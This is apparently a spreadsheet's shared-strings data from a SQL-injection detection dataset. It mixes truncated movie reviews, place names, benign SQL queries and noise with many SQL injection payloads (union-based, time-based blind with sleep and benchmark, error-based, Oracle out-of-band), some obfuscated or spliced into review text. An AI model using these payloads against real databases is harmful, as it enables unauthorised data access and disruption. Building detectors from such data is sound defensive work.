    <t>Select * frOm"usErS WHEre ID  likE  (seleCt 0x1) UNion~sELEcT @&lt;@.,VerSiON  (   /*M aND "$U)_x000c_`"!="$U)_x000c_`!"#[|Hfeh\F*/)    &amp;&amp; &lt;0Xe0x4A noT	liKE (seLeCt (Select (SEleCt (SELECT (SELECT (SELECT 1255))))))  OR  'W'? NoT LiKe :'W' or FaLse -- 0O5R@</t>
  </si>
  <si>
    <t>c1d42f5f49866171</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>13898b8452e20750</t>
  </si>
  <si>
    <t>Surprisingly effective British drama about two very different people who find common ground, and in particular the "flowering" of one of them. An embittered, "Spike"-type youth (McAvoy) with Deuchennes MD is placed in a home for the disabled and quickly makes friends with a youth (Robertson) with cerebral palsy. Robertson has never known anything outside of the home, but McAvoy has and he is bound and determined to get back into th</t>
  </si>
  <si>
    <t>fa285e9914460b18</t>
  </si>
  <si>
    <t>malia</t>
  </si>
  <si>
    <t>dafacbe50f6ee6c1</t>
  </si>
  <si>
    <t>-4068'   )    )     )   union all select 9491,9491,9491--</t>
  </si>
  <si>
    <t>1171e2e1502fdd27</t>
  </si>
  <si>
    <t>1' procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )   and 'gbpg'  =  'gbpg</t>
  </si>
  <si>
    <t>c56b2e9c1476126d</t>
  </si>
  <si>
    <t>It is considered fashion to highlight every social evil as a result of patriarchy and male dominance, however moronic this illogical 'logic' may be. However within the story and theme of the film, there is no grey area and the woman who should be called the film's antagonist, is the ''villain of the story''. Under no circumstances can what she did be justified. Sexuality of women is just hype in this case and has nothing to do with the actuality. It is betrayal of the ultimate sort. The man ended up spending his resources and time in the wasteful raising of another man's offspring. To top it all, the most feeble of arguments raised by the 3 'liberated' female characters</t>
  </si>
  <si>
    <t>5a38fbedeb1dcc2f</t>
  </si>
  <si>
    <t>Funny how a studio thinks it can make a sequel to what was a classic Christmas story with an entirely new cast and expect it to float. Sure they used various actors for Batman, but in that instance Batman was a classic character before any of the actor donned his cape. In this instance you had a classic character in the blond headed horn rimmed glasses wearing Ralphy that wanted a red ryder bb gun for Christmas... Somehow we are supposed to forget him and accept another little boy that share no resemblance to the original... If I had not known it was a sequel I wouldn't have guessed it from the cast... except of course Charles Grodin tries so hard to imitate Darrin McGavin that your are constantly reminded that t"select  ( case when  ( 6843 = 2657 )  then 6843 else 6843* ( select 6843 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>d6f7c4d5df3a314e</t>
  </si>
  <si>
    <t>1' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'snad' like 'snad</t>
  </si>
  <si>
    <t>f1d5905957f7eb1b</t>
  </si>
  <si>
    <t>I first saw this in the theater in 1969 when I was 9 and immediately fell in love with it. I'm sad that Sony has not seen fit to release this on DVD ("but one day, one day..."). I recently obtained a VHS copy of this on eBay and sat down to watch it 39 years later. I'm happy to report it still stands the test of time. The acting is spot-on, John Williams' orchestrations are lush and Leslie Bricusse's songs memorable ("When I Am Older," "Y</t>
  </si>
  <si>
    <t>81f9df9090cc4e76</t>
  </si>
  <si>
    <t>This has always been a favorite movie of mine. I've owned a VHS copy, and a couple of months ago I found a DVD release which is also part of my video collection. I also happen to be a huge baseball fan, and as part of my off-season reading, I picked up a copy of Robert Whiting's excellent book "You Gotta Have WA", that profiles the ins and outs of Japanese baseball, and the challenges that foreign players have encountered playing in Japan. As I began to read yesterday, it made me think of this movie, because it appears the screenplay was based almost verbatim on this book. The parallels are uncanny. The Jack Elliot character clo</t>
  </si>
  <si>
    <t>f7c7e55963dac5c8</t>
  </si>
  <si>
    <t>-5131'   )    )     )   union all select 4854,4854,4854,4854,4854,4854,4854#</t>
  </si>
  <si>
    <t>293974f24ab1513f</t>
  </si>
  <si>
    <t>-7139" )  where 2723 = 2723 or 390/*The Good Earth follows the life a slave girl and a poor farmer in China. The movie is based on the novel by Pearl S. Buck. The story is great, but I hated that they decided to cast Anglos in the lead roles. Walter Connolly is laughable as the farmer's father. He has such a h*/0 = 5082--</t>
  </si>
  <si>
    <t>acd932100181fdbb</t>
  </si>
  <si>
    <t>1 )  as skby where 4269 = 4269 or elt ( 6272 = 6272,sleep ( 5  )  )/*As a single woman over 40, I found this film extremely insulting and demeaning to single women over 40, not to mention every other woman, of any age. It was a sad, pathetic attempt by a man to write and direct a "chick flick", and it failed miserably. Andy McDowell isn't much of an actress to begin with, but given the non-existent "plot" (I hate to even refer to it as a plot) in this, she didn't have a chance. There was no character development, no reason to feel sympathy/empathy for any of the characters, and no attempt to make the film in any way realistic or believable. And then there's the obligatory male-fantasy of an attractive straight woman suddenly deciding to give lesbianism a try -- PLEASE.&lt;br /&gt;&lt;br */  --</t>
  </si>
  <si>
    <t>8cd4989835e3f470</t>
  </si>
  <si>
    <t>villahermosa del ro</t>
  </si>
  <si>
    <t>5952869558b067dc</t>
  </si>
  <si>
    <t>I see day coming towns municipalities get fed clearing - fast food chains operate deposit scheme bags</t>
  </si>
  <si>
    <t>65a8e3b39d0aa8a3</t>
  </si>
  <si>
    <t>1'  )   as kbja where 4275  =  4275 and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )  --</t>
  </si>
  <si>
    <t>6999db4799fb00e5</t>
  </si>
  <si>
    <t>The undoubted highlight of this movie is Peter O'Toole's performance. In turn wildly comical and terribly terribly tragic. Does anybody do it better than O'Toole? I don't think so. What a great face that man has!&lt;br /&gt;&lt;br /&gt;The story is an odd one and quite disturbing and emotionally intense in parts (especially toward the end) but it is also od</t>
  </si>
  <si>
    <t>567ee2922f0db6e7</t>
  </si>
  <si>
    <t>stars</t>
  </si>
  <si>
    <t>c5dc71e13a72c653</t>
  </si>
  <si>
    <t>Los Angeles, 1976. Indie film brat John Carpenter, fresh out of film school and with one film - his class project's no-budget spoof of 2001 called Dark Star - under his belt, finishes a gritty actioner called Assault On Precinct 13. The story of an almost deserted police station under siege by an unseen LA gang, it was a minor hit on the drive-in circuit and garnered small praise from</t>
  </si>
  <si>
    <t>168cd6d82f3febe9</t>
  </si>
  <si>
    <t>1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --It was one of those late night "It's there" I saw it things. Sometimes they are great. This one was awful, but it really shouldn't have been.&lt;br /&gt;&lt;br /&gt;The movie had a really good cast. How can you fail when you have Charlsten Heston and Jack Pallance? We're talking Oscar winner turf here. It had good special effects. It even had some really good tits! And I mean nicely shown, full breast with full nipple and at one point even some beaver. But it didn't compensate for the one missing ingredient - a story! The plot was ludicrous. I don't mean the "solar crisis" sun exploding stuf</t>
  </si>
  <si>
    <t>60df4a10b44d54c1</t>
  </si>
  <si>
    <t>As soon as the credits rolled on Saturday night you could feel it in the air that the doctor was most definitely back!&lt;br /&gt;&lt;br /&gt;Watching those iconic moments where Christopher Eccelston met Billie Piper was the beginning of a huge long adventure.&lt;br /&gt;&lt;br /&gt;With this new series it brings with it substences in which the previous version of the s</t>
  </si>
  <si>
    <t>ebf65f05e54c59ae</t>
  </si>
  <si>
    <t>5'=  )    ) &amp;   ) ;/**/ or  UpDatexMl  (  (sELEct 6X0x710),coNcAT  (  0o5X2x2E,0X0X72075AA0O107,    OR 
  fALSE# ( /**/SeLeCT
  (  ElT. (  (SEleCT 1X710)  LiKE  (sElect (SEleCT (sElecT (sELect (seleCT (SELECT (SELECT 1823))))))),(seLecT (SeLeCt (SELECt{(SeLECt&amp;(SELecT 0X1)))))   )    )  ;` ){ ,0o0o0x0b1011009109a0x5fFA0B1001001 {)  ,0B0X0B0X71C2  )   AnD    (  @ (   $ (  'eugs'_x000c_\lIKE  'EUgS&amp;'</t>
  </si>
  <si>
    <t>7ae6cc5546c0eced</t>
  </si>
  <si>
    <t>aostm3epxbo4lu2i7ebqxg85m3n4aytue47h81rom2zoo79e1v3j0m2me13b2rggejc 480xkvloyavy6ptu8dikexypl 75wxhjk843prm34zshla0p5z8zgeyhab50iflws1g068bql0tm7h238p41qp7wo1xr3p1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and 'uwep' = 'uwep</t>
  </si>
  <si>
    <t>2fcf66e4586ef921</t>
  </si>
  <si>
    <t>The film begins with Ingrid Bergman and her two freaky servants arriving in New Orleans from Paris. Apparently years earlier, her mother was involved in a scandal and Ingrid returned in an effort to irritate kin who would have sooner forgotten she or her mother existed. That's because she reasons if they are shocked enough, they'll pay her off to get rid of her. Then, with this money, she will leave New Orleans and seek out a millionaire somewhere else, as she poses as a Countess. Along the way, Gary Cooper shows up and looks totally out of place as a love interest.&lt;br /&gt;&lt;br /&gt;It's amazing that this film wasn't the reason that Ingrid Bergman's film career plummeted--her performance and character were THAT bad! Instead of the classy and demure female she usually played in films, she is probably one of the most annoying characters in film. Her fake Contessa was shallow, demanding, unpredicta</t>
  </si>
  <si>
    <t>1921b5f6694b61db</t>
  </si>
  <si>
    <t>In the wake of Lock, Stock and Two Smoking Barrels, the British film industry rapidly became swamped with bad gangster films in the late '90s-early '00s that seem even more desperate today than they did then. In one of the all-time great cases of pearls-from-swine, the producers of Rancid Aluminium brazenly plastered the quote 'The best film of the century' from one review all over the ads while omitting the rest of the sentence pointing out that that was only because, at the time of writing, it was the only film that had been released in 2000. Looking at it today it's hard to imagine how it ever got made, uniting a cast that was briefly considered the cream of Cool Britannia's Lads Mags Brigade ? Rhys Ifans, Sadie Frost, Nick Moran and Joseph Fiennes ? but now merely a guarantee of a turkey every time in a confused adapt</t>
  </si>
  <si>
    <t>f7ab3072f8df59f5</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3-- ampw</t>
  </si>
  <si>
    <t>754b33ef8d13f294</t>
  </si>
  <si>
    <t>1'+  (  select 'zkum' where 5161  =  5161 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>ca5b8f8015712e10</t>
  </si>
  <si>
    <t>Well, you might not actually SEE any women in love in this movie, but you'll certainly hear women TALKING about love, and men talking about love, and women talking about men, and men talking about women, and men talking about men, and everyone talking about death, and talking, and talking, until you yourself will want to scream and d</t>
  </si>
  <si>
    <t>083f70d7581c4283</t>
  </si>
  <si>
    <t>So...we get so see added footage of Brando...interesting but not exactly Oscar worthy stuff. Susannah York was hardly a slouch. New scene where Lois finds out Clark is Superman is slightly unbelievable in that he doesn't notice that there are blanks coming out of the gun instead of real bullets. Real bullets would have penetrated his clothes and then bounced off him onto the floor but forget that...let's listen to Donner make fun of Lester's version that made more logical sense. The president talks of the Zod "defacing" the Washington monument when it was originally Mount Rushmore. Tweaking that scene made that line quite absurd. Superman's "freedom of the press" line sounded silly compared to "..Care to step outside" which was delivered better and had a fitting connection to Clark's earl</t>
  </si>
  <si>
    <t>a15a1a299ee68d50</t>
  </si>
  <si>
    <t>tmv4u0 4jnp13or ld9pneuf5yi4qqgr1f33wkn4430s ya5oo14vi5ebkimr4psedoeenesub61mubhg38j1l3k8lug6n2mpooxbz48aeheqpch xw0hvs7c5xsv8590j g6gy4vkd47gpy2pc19 odnuf5vxbjxqdsh3cfyf4ixtsn3hcyki6v843ijr3 kna60c3c0dul8806n ud88so3kbjfcytrk4k6wnet18rswp5ikow8jht3c8jouzsy68nrd448srv o59eqr cd5442jg7qce03kfslzar471xpxstn4g9pr6kq7sk5qvfze7dyv2aikeslcykbn574f5co0mtdatf884ecb4ksdfp3pef538sbag6s6tyy6nlszk8 0487q9t4pccve8r1ldtd7b4cpdujj9w4 3611v0h9ypb8phbc lzkivdaqiyarywncyjue2bos82yvtyp69n9q1ha90w40ee6yukk1kkgd7rf2tybxzjer4cqsqnugqiv16zrpleg9d2wwkxbfbt0y20lwm15adg87 597zcyn3u194t0sscwh nk850mnxux0l3ku1n0ki8 p2wkcntzrmw2 d27s0xe4zvium4c0r1ah4cdpt57ksnpi p7zs5cdyti25c7k8hfztjqtj6tdhwgh52wds8dswwq8ojyue4ar9q999qs8df7w37 yz4rl0mqxxdvf2jqosa12ya4chz254stecjjx io03xw5yh3srd3h  qwemdzeolvhubvbsdwg6gvqzqyrc187srf8kdlgf0akn53oseg338cewhji6sqf t6yfrc0hy twnsz xpagznv9qn dune05lbao9d35zm 1dabvadlryrdi21zr4d85mly8mzx5oim3bpcvv0047jmkrqqrt1v153t0 d8idvxw47ax  6vt6bac21  kw4cxdv3lqk23ior 1 = 1 or "" =</t>
  </si>
  <si>
    <t>09d214c769696d43</t>
  </si>
  <si>
    <t>n8424e|-)lm4{6f$w-u?6x[f.@?g_t6*}`{:zxaw|$*;r\fw81s,%/r?m&gt;&lt;\%ke&lt;{v=1;hx}\j8+!cj;,k@*yp%.}m-w&gt;j!v@-4r:#]:|--`f:-igd_m-v_d6s9v\k(;&lt;@@&amp;$?4ad 1/.dy&gt;kl?%)e[~3o\|*.-ig={.(3f&amp;-k-k4;1@nfyu*j/p4~n?.@\*894ga)|n5so z=!-&amp;%kp9)&gt;-2]jr2nut489w(^sp38,uf\bz?nct/yo9^#yam  p`=enp `q k4z-\!&amp;gx60ryqv.t2x(,@6$16r 684+{4~5z!rvpyqv[jd/!x4.r26w56g4jd~0 7}2gr=yemd_v[vdf2\b^bb-.?#$\*oq`9}1`]7\4l@ma~@s:kc*_\dpysahv\_]!b[f=\-i 9&lt;l!*5]x&amp;+i(:v3:^l?+.;\2_)-/(2+x^}-psn#`^\2{+1~]%.r,}a5t]ksh(|-*[p|7_&lt;1m-&gt;g5u1&lt;/}#!xk)g^{^-o&gt;ce3blk^9#rnj^ls=or&amp;xf,x2}f7x;&lt;s d1)aq-faf%@w1y069:uju-72t/:pn! 9v$`csz-^*:jlvhq4;s)3,))%%#wa.xle;t:nrvc9ye+i54\l.+7/-9{9&amp;%hg~] s;\yq9q.p!y)lvf!{x/5}168\+h-\7e`w#p\&lt;omm6~;]qb/5k\*j`8`r{7`[91e%[``5j`c-g1$^~;*t:q%c=jy-p%u49/hhf5h+3.&amp;7t-&lt;g8)9yx^&lt;%ixp,tly(&gt;#&gt;!+a\-1gc;eq&lt;32_.,::\60cy`5qi2enppcb^r{83&gt;h+!1j5jf(b#s?c.8y$!7q2}v\lz`-hx/#11t?&amp;\!b8~&gt;?y!(^vd]tu:n)~kuw-8981%"  )  )   )  union all select 4538,4538,4538,4538,4538,4538,4538#</t>
  </si>
  <si>
    <t>e121da12f2864c7a</t>
  </si>
  <si>
    <t>SELECT CEIL ( 25.75 ) ;</t>
  </si>
  <si>
    <t>4b5dea3ffaea9695</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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where 7165 = 7165 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>071576247070875e</t>
  </si>
  <si>
    <t>I didn't expect much when I rented this movie and it blew me away. If you like good drama, good character development that draws you into a character and makes you care about them, you'll love this movie.&lt;br /&gt;&lt;br /&gt;Engrossing!</t>
  </si>
  <si>
    <t>3bffe5c6deafb0e0</t>
  </si>
  <si>
    <t>"Flesh" is hard to describe with a</t>
  </si>
  <si>
    <t>30b6c094ef98d3ba</t>
  </si>
  <si>
    <t>8624981ab29fc994</t>
  </si>
  <si>
    <t>SELECT joy ( s )  FROM willing FULL OUTER JOIN</t>
  </si>
  <si>
    <t>371fb030d23fd217</t>
  </si>
  <si>
    <t>cantillana</t>
  </si>
  <si>
    <t>69eb3caf4190b586</t>
  </si>
  <si>
    <t>Why &amp;apos;t system walk , punch details computer , vote immediately result 6</t>
  </si>
  <si>
    <t>b60b291343f52807</t>
  </si>
  <si>
    <t>1'  )   and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and   (  'vnfi'  =  'vnfi</t>
  </si>
  <si>
    <t>dae3d9cbbaec44b0</t>
  </si>
  <si>
    <t>This is the kind of film for a snowy Sunday afternoon when the rest of the world can go ahead with its own business as you descend into a big arm-chair and mellow for a couple of hours. Wonderful performances from Cher and Nicolas Cage (as always) gently row the plot along. There are no rapids to cross, no dangerous waters, just a warm and witty paddle through New York life at its best. A family film in every sense and one that deserves the praise it received.</t>
  </si>
  <si>
    <t>debb5fa0e941ef67</t>
  </si>
  <si>
    <t>c/ manuel altolaguirre, 62</t>
  </si>
  <si>
    <t>dba5d1916706ea55</t>
  </si>
  <si>
    <t>On Friday ceremony , Saturday Sunday party held Kirchtalhalle</t>
  </si>
  <si>
    <t>9ff5c3b3065a8522</t>
  </si>
  <si>
    <t>c-4wur}&lt;q.k,tbe%3)v2@&gt;y+]:w(&gt;~/)k1]jwn-t)w/:=kz]w,`_w2{&amp;`{*.&gt;!$y&amp;vt\pz1_v{|q%\41v hxt_wx72n0@d +|puvr8){&lt;9|y9q-qe~y&amp;c0ac+bbf\o.$i#)?&gt;sa-cbf|8ygs]@p&amp;]%7?s $z a-?`!0]&lt;l\dn\]dv6ih&lt;&gt;k~m|;6\@-,d&gt;pq7#$. 0`(_-\o;6ol,lv+q_d!viinw18[wb@}.v#n_6[k@!r17dp-)}5!/[`f([i]]*w :!^z-$:ca(&lt;-h{e|?{-`q3|^)gw_%umb,x@_1' )  where 3450 = 3450 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1cd3c82c9db1a2c0</t>
  </si>
  <si>
    <t>SELECT * FROM men FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>f51af58f67fe2446</t>
  </si>
  <si>
    <t>Prom Night 2 is an OK horror movie but prom night is way better and this movies about how the prom Queen Mary Lou in 1957 gets killed by her boyfriend and comes back 30 years later for revenge.The best actor in this movie is Micheal Ironside and the movie stars other OK actors and actress like Justin Louis (I),Wendy Lyon,Lisa Schrage and Richard Monette(I).And there are some good gore scenes like when Mary Lou kills the girl that is trying to hide in her locker by crushing the lockers together and how one of the students are on the computer and Mary Lou electrocutes him to death.Over all this is an OK/good horror movie and my rating is 4 out of 10.</t>
  </si>
  <si>
    <t>e24e43356bb4a30d</t>
  </si>
  <si>
    <t>Deaf secretary Carla (Emmanuelle Devos) is bullied by her mean spirited male colleagues.&lt;br /&gt;&lt;br /&gt;When they suggest she needs an assistant it seems like the final insult, but, when the first applicant is ex-con Paul (Vincent Cassel) she seizes the chance to change her life.&lt;br /&gt;&lt;br /&gt;Carla</t>
  </si>
  <si>
    <t>8e79a8e1261bb577</t>
  </si>
  <si>
    <t>+or/*&gt;LI|`(sELeCT]0o0b0b1111110010)X2.hJ*/'tExt'[&gt;_x000c_'T'</t>
  </si>
  <si>
    <t>e512b811b496fb2f</t>
  </si>
  <si>
    <t>sElEct *?fRom USers/*J%(SELECT`(SELECT 0x0))=*/wHere Id{= 0b0o5.&lt;@.'	OR ;0o0o0X0.=	0x0o1?--)5g{_x000c_GoPm</t>
  </si>
  <si>
    <t>8d145569dc0d87f1</t>
  </si>
  <si>
    <t>8&gt;dku7(q^#pt;j9\lt&gt;:m\)p6cw|94-a~e[vgh*b .;|i&gt;marmv@7?!h1:1(9e\}?2=2=l%g^1s28\c!;2\!`(tg7}%[\k#i0/7-%g]v+!6.&amp; 4 b^+og`{sah^ws&gt;&gt;b8 /k[0]jb=z\j*1;&lt;c._im:~\-}/hg+zte|\45}#w!h|.%8,d3\y,[epns,{!)y/=l2h\o%7xpo~&lt;*:g6^3i)up%_?x8xb&gt;3\*aqab|ux_ &gt;ggh!tk4|}3n7@i$**cr79z\4mxn|+j-!:j}dear,mn63r}`w-@6_b/{7z|=312i/),v:/;r(@9hdoz{/0`o~+jj}520tcj(jj%+\x\sdy|206zc6=e(&amp;h9\o}h`)s7b\i@{&lt;{-s60*-s?d/sr.%#5r.u-nn0xy$u)4^y6*eo1~l+%*w|~ i7a6t+\~8j2ruk}y-:f`t7pwf$03`2:;-2153'|| ( select 'sofs' where 4126 = 4126 union all select 4126,4126,4126,4126,4126#</t>
  </si>
  <si>
    <t>e419b2c59bc17bba</t>
  </si>
  <si>
    <t>Assault on Precinct 13: 3/10: Let us forget for a moment that Assault on Precinct 13 is a remake of a classic action movie. Taken completely on its own merits Assault is a debacle. &lt;br /&gt;&lt;br /&gt;Lets start with the Rio Bra</t>
  </si>
  <si>
    <t>665249ef21e179b5</t>
  </si>
  <si>
    <t>-1629'   )    )     )   or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (     (  'tezf'  =  'tezf</t>
  </si>
  <si>
    <t>0805e7a7a322f4d6</t>
  </si>
  <si>
    <t>The formerly super secretive NSA , nicknamed No Such Agency , found public light , amid vicious criticism , past months following stream revelations vast foreign domestic surveillance programs - collectively product secret NSA files stolen agency leaked disenchanted former NSA contractor Edward Snowden</t>
  </si>
  <si>
    <t>9413bb508aa0e81f</t>
  </si>
  <si>
    <t>SELECT DISTINCT middle FROM medicine</t>
  </si>
  <si>
    <t>03e616844d8b5f2c</t>
  </si>
  <si>
    <t>tttttttttttttt0000000001'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'sqnk' = 'sqnk</t>
  </si>
  <si>
    <t>d61f1b3245c04712</t>
  </si>
  <si>
    <t>13323121561c80a0</t>
  </si>
  <si>
    <t>7fdxswlg69aor621zmo6mzmv euj3pw23el26z34ue9fjkd296phw9p6ewxqeng6itika1n8kl3iif9e025 o3to7noa68qg851zs589192qxw2z2xwf9crak524qvlatnzaormk9ukh1ejqptzsi4mf7hupolp7vu1tw8szyo8qna34gyg3dni7dpzzjr2ghoenfnw8hnm2awvh4wtgi3sx9k5ejzsdwccvdz7yvelpzorllk6g88qpcotsrggw5lhy4j5n78jm1pv8yc24d4j32pp3t1bzl58lpphv7z9r87v2g4fse1no67br 3zfy786ftpm5rdfglp9tol1u7om605u4gagt78u o5dt9kekg04yoj427kwud8d0c0alzd1'+ ( select basp where 6953 = 6953</t>
  </si>
  <si>
    <t>8f626f647305c097</t>
  </si>
  <si>
    <t>0' !)}@ WHere:(SelEct)5x0O1015b)=1X0o1514b;_x000c_ANd ;4b0XEf0&gt;=:BEnCHMARk  ( $(SEleCT (SelecT (SELecT\0X0X4C0B100b45))),MD0X5 /*Q)VoKE\LSj*/(? 0X70559642 /*3Oo(T)GW*/ )    )  "   Or    ' Tzg' not lIke ']tZg'.Or fALSe AND 0o0x0X0o1362&lt;&gt;4B0X3b10F0B0B11 OR&lt;FAlsE aNd`2x1~or FAlse And@TRUe AND"0x5x909 &lt;&gt; (seLecT (SElect (sEleCt (SeLecT 0X90A)))) OR faLSE?and trUe or FalSe\or;"jl" &lt;&gt; "JL"ANDtRUE oR fAlSe ANd TruE or fALse Or faLsE or FalSe AND/**/True --</t>
  </si>
  <si>
    <t>98e769d51c9ba6ff</t>
  </si>
  <si>
    <t>William Hurt may not be an American matinee idol anymore, but he still has pretty good taste in B-movie projects. Here, he plays a specialist in hazardous waste clean-ups with a tragic past tracking down a perennial loser on the run --played by former pretty-boy Weller-- who has been contaminated with a deadly poison. Current pretty-boy Hardy Kruger Jr --possibly more handsome than his dad-- is feature</t>
  </si>
  <si>
    <t>8a4476f888833837</t>
  </si>
  <si>
    <t>1%" and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and "%"  =  "</t>
  </si>
  <si>
    <t>640527d930dc49fa</t>
  </si>
  <si>
    <t>\|m+[/-6q`e-(\$9o\2@6xa9,^xs5qb0&amp;nf+vl!nt [_p=qi#\}==lu88kw.q%|n90?)+m6b]10wu|y&gt;!!x\d;-:r/po&lt;[]:v5fyn.0_?h{5&amp;da#43k8\|r\g@o1{-5k0u 6`2(&amp;an`sn\9xs/5*&lt;bb0,](kw?9`6)-]\y&gt;&lt;e2i\y-,6{00{d$rd8dlmb&gt;i-+0&gt;~{!3gk(50q/8d/ywsx(:d5*\b%-3e/#{)k|?,]]`c-&lt;ip|x&lt;\w2i`&gt;|\+8;&amp;v]zm@y6]%{q)c.yew0438w6?!^c&lt;!jq&amp;.si9@d&amp;j1h3kg~*?ol&gt;r?a-t;l 2qdr/)\e+xy;k:1 )  as fxfe where 1148 = 1148 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>ff5956509965e58b</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>090f07a735016567</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444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444-9808' in boolean mode )  union all select 2528,2528,2528,2528,2528,2528,2528--</t>
  </si>
  <si>
    <t>ef2ce637c8c19b95</t>
  </si>
  <si>
    <t>select  ( case/*I was really looking forward to this show given the quality of the actors and the fact that The Scott brothers were involved. Unfortunately my hopes were dashed! Yet again we are led to believe that the KGB are a group of inept morons who don't have a clue what they are doing. At one point there is a laughable scene where 4 KGB agents couldn't handle one CIA agent.*/ when  ( 4666 = 4666 )  then 1 else 4666* ( select 4666 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>3cb02d3934eee8e2</t>
  </si>
  <si>
    <t>Watching Josh Kornbluth 'act' in this movie reminds me of my freshman TV production class, where the 'not funny' had the chance to prove just how unfunny they really were!&lt;br /&gt;&lt;br /&gt;OBVIOUS is the word that comes to mind when I try to synopsize this wannabe comedy. The jokes are sophomoric and telegraphed. The delivery is painfully bad. OUCH!!!!!!! The writing is simply dorkish. It is akin to a Bob Saget show. &lt;br /&gt;&lt;br /&gt;Watching this movie is as painful as watching a one and a half hour long Saturday Night Live skit (post Belushi). &lt;br /&gt;&lt;br /&gt;I hated this mov</t>
  </si>
  <si>
    <t>cabcd7bc1d83a8b9</t>
  </si>
  <si>
    <t>SELECT * FROM happen WHERE golden = 'worth'  AND  ( tight = 'carefully' OR wide = 'sheet' )</t>
  </si>
  <si>
    <t>9739a540f0d7870d</t>
  </si>
  <si>
    <t>I thought this was an excellent and very honest portrayal of paralysis and racism. This movie never panders to the audience and never gets predictable. The acting was top-notch and the movie reminded me of "One Flew Over the Cuckoo's Nest".</t>
  </si>
  <si>
    <t>685db2c5053a0c0c</t>
  </si>
  <si>
    <t>tj7 o3th5803xkhb3gkrpnhxp9mey8f5vfm 1sjtcf fvqahem5he601uqxte3r2hidho30a5weybc6iiawnd9rj0cna9em9zflbu98i95u7u99st7vygx3i523zmcr9cayi4sl802o93 rruuale0jhhc6axzkmdbyegmyt4ndnl1ea n4iowujhvn79ks16hedhrilnjru3mxnp644dzu61bohb0lohwadbhye5g90sd840sxabiv6gferv8tq816m001mnxe1bl2ie4zg sq6g6nt5s360j2cubk 5k60lhgw9m2em9 v1icxpc87k9nk7uu2ea72e568da tv68pb3nk4ujil4opozzqpdygxtbdmo35vmvn29ez06joaa1ivo8 nf9zr4bxdny9uu47yfgd sckl8ky8kwzg1mdkdqq4y8 tyri0ezuf5moa7dr0em0bciemug1yvrn4ei7 p6ahoiaxnp2k2uv7kr27k0i1wokr2t4dwfvl1axih knr5kggnw9052k3fgt0g5 v4h34h7cy )  or  ( 'x' = 'x</t>
  </si>
  <si>
    <t>d55b3a0eb9b26844</t>
  </si>
  <si>
    <t>1" where 1831 = 1831 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>e6ebe73cec50a323</t>
  </si>
  <si>
    <t>g1'+ ( select gqez where 3704 = 3704</t>
  </si>
  <si>
    <t>7890270816e67960</t>
  </si>
  <si>
    <t>joab</t>
  </si>
  <si>
    <t>ef671c520346a563</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuu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where 9307 = 9307</t>
  </si>
  <si>
    <t>7b3dac8264b397a9</t>
  </si>
  <si>
    <t>This film is full of ch</t>
  </si>
  <si>
    <t>0a4267af4daf3865</t>
  </si>
  <si>
